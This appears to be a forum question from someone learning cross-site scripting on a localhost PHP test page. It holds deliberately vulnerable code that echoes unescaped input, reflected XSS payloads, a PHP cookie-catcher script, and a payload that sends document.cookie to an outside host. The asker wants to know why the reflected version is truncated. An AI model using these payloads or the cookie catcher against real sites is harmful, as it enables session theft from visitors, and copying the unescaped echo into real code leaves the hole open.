i'm learning how XSS works and how far can attackers use it to damage my visitors. i read at w3schools that using $_SERVER['PHP_SELF'] to echo the current file like this:
<form method="post" action="<?php echo $_SERVER['PHP_SELF'];?>">
without using htmlspecialchars() can make my application vulnerable to xss,so i made a very basic test page at my localhost,here's the source:
<!DOCTYPE html>
<html>
<body>
<form method="post" action="<?php echo $_SERVER['PHP_SELF'];?>">
Name: <input type="text" name="fname">
<input type="submit">
</form>
<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") {
// collect value of input field
$name = $_REQUEST['fname'];
if (empty($name)) {
echo "Name is empty";
} else {
echo $name;
}
}
?>
</body>
</html>this page is vulnerable for both XSS stored and XSS reflected. First I tried the following payload with the url:
localhost:553/xss test.php/"><script>alert(1)</script>
and it popped up an alert box and everything was good,tried the same with the input form and it worked also,i tried to capture cookies with php and made the following script to capture cookies:
<?php
$cookie = $_GET['c']; //This obtains a value of variable c in url passed by GET method of HTTP and stores it in $cookie
$ip = getenv ('REMOTE_ADDR'); // Gets the value of an environment variable which denotes the IP of client and stores it in $ip
$date = date ("j F, Y, g:i a"); //Records the Date and Time of capture
$referer = getenv ('HTTP_REFERER'); //Gets the value of an environment variable which denotes the site which redirected to your cookie catcher and stores it in $referer
$fp = fopen ('kendo.html','a'); //opening a file kendo.html in append mode in which details will be stored
fwrite ($fp, 'Cookie :'.$cookie.'<br/> IP :'.$ip.'<br/> Date and Time :'.$date.'<br/> Referer : '.$referer.'<br>'); //passing the reference of file kendo.html and passing the rest of the details we obtained
fclose ($fp); //closing the file reference
header ('Location: http://example.com/'); //Redirecting the client back to page you wish
?>
uploaded it to my site and tried the following payload with XSS stored:
<script>document.location="http://example.com/404.php?c=" + document.cookie</script>
where 404.php is my cookie catcher it worked perfectly,but when i tried the same with the url like this:
localhost:553/xss test.php/"><script>document.location="http://www.example.com/404.php?c=" + document.cookie</script>
nothing happened,i looked at the source and found this:
<!DOCTYPE html>
<html>
<body>
<form method="post" action="/xss test.php/"><script>document.location="http://example.com/404.php">
Name: <input type="text" name="fname">
<input type="submit">
</form>
</body>
</html>
something striped the rest of my payload,i kept searching for 2 days for the root cause of this but i wasn't able to find out why,tried other functions like window.location and got the same result...why would something like this happen?
